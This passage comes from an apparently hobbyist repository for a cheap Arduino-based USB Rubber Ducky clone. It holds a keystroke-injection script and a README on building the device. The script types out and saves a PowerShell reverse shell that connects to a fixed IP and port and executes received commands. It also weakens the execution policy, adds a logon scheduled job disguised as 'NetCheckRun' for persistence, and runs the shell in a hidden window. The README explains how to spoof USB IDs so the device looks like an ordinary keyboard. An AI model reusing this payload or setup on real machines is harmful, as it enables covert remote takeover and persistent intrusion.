| STRING param([String]$dest, [Int32]$port); 10 | ENTER 11 | DELAY 50 12 | STRING while (1 -eq 1) { $ErrorActionPreference = 'Continue'; 13 | ENTER 14 | DELAY 50 15 | STRING try {$client = New-Object System.Net.Sockets.TCPClient($dest,$port); 16 | ENTER 17 | STRING $stream = $client.GetStream();[byte[]]$bytes = 0..255|%{0}; 18 | ENTER 19 | STRING $sendbytes = ([text.encoding]::ASCII).GetBytes("Client Connected..."+"`n`n" + "PS " + (pwd).Path + "> "); 20 | ENTER 21 | STRING $stream.Write($sendbytes,0,$sendbytes.Length);$stream.Flush(); 22 | ENTER 23 | STRING while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { 24 | ENTER 25 | STRING $recdata = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); 26 | ENTER 27 | STRING if($recdata.StartsWith("kill-link")){ cls; $client.Close(); exit;} try { 28 | ENTER 29 | STRING $sendback = (iex $recdata 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";} 30 | ENTER 31 | STRING catch { $error[0].ToString() + $error[0].InvocationInfo.PositionMessage; 32 | ENTER 33 | STRING $sendback2 = "ERROR: " + $error[0].ToString() + "`n`n" + "PS " + (pwd).Path + "> "; cls;} 34 | ENTER 35 | COMD $returnbytes = ([text.encoding]::ASCII).GetBytes($sendback2); 36 | COMD $stream.Write($returnbytes,0,$returnbytes.Length);$stream.Flush(); } } 37 | COMD catch { if($client.Connected) { $client.Close(); } 38 | COMD cls; Start-Sleep -s 30; } } 39 | REM save the file 40 | ALT 41 | DELAY 200 42 | STRING f 43 | DELAY 200 44 | STRING a 45 | DELAY 300 46 | STRING My Documents\psAuxL.ps1 47 | ENTER 48 | DELAY 2000 49 | ALT 50 | DELAY 250 51 | STRING f 52 | DELAY 200 53 | STRING x 54 | DELAY 500 55 | REM open powershell and set the execution policy 56 | GUI 57 | DELAY 1500 58 | STRING powershell.exe 59 | DELAY 800 60 | MENU 61 | DELAY 500 62 | STRING a 63 | ENTER 64 | DELAY 1200 65 | ALT + Y 66 | DELAY 250 67 | ENTER 68 | DELAY 3000 69 | REM first lets set the execution policy if possible 70 | STRING Set-ExecutionPolicy RemoteSigned -Scope CurrentUser 71 | DELAY 50 72 | ENTER 73 | DELAY 750 74 | STRING Y 75 | DELAY 250 76 | ENTER 77 | DELAY 200 78 | STRING $dirx = "C:\Users\" + [Environment]::UserName + "\Documents"; 79 | DELAY 70 80 | ENTER 81 | DELAY 50 82 | STRING $fullpath = $dirx + "\psAuxL.ps1"; 83 | DELAY 70 84 | ENTER 85 | REM finally - attempt to make the shell survive a reboot 86 | STRING $jobtrigger = New-JobTrigger -AtLogon -RandomDelay 00:00:50 87 | DELAY 50 88 | ENTER 89 | DELAY 400 90 | STRING Register-ScheduledJob -Trigger $jobtrigger -Scriptblock{cd $dirx; ./psAuxL.ps1 -dest 192.168.0.30 -port 6673} -Name "NetCheckRun" 91 | DELAY 50 92 | ENTER 93 | DELAY 1200 94 | STRING cd $dirx; 95 | ENTER 96 | DELAY 200 97 | STRING powershell.exe -windowstyle hidden {./psAuxL.ps1 -dest 192.168.0.30 -port 6673} 98 | DELAY 100 99 | ENTER 100 | DELAY 200 101 | STRING exit 102 | ENTER 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # USB-Rubber-Ducky-Clone-using-Arduino-Leonardo-Beetle 2 | This project realises a basic version of the 'H4K5' USB Rubber Ducky for under $10 by utilising a $5 CJMCU Beetle board connected to a $5 Arduino compatible microSD card reader module. Only six solder connections are needed. The microSD card carries the encoded keystrokes which are to be send to the target pc. 3 | A simple Windows application (written in C# - source included) is used to convert a command script text file into the 'script.bin' executed on duck. The scripting language is almost 100% compatible with the 'H4K5' devices at $50. 4 | Read the 'Instuctions' pdf document for full build and construction details. 5 | 6 | Note: If you want to 'hide' the fact that the ducky clone is an Ardunio, its possible to make changes to some of the Arduino setup files (boards.txt and USBDescriptor.h) such that the USB VID & PID codes can be altered to make the device look like a standard keyboard only from any manufacturer you wish.) 7 | 8 | --------------------------------------------------------------------------------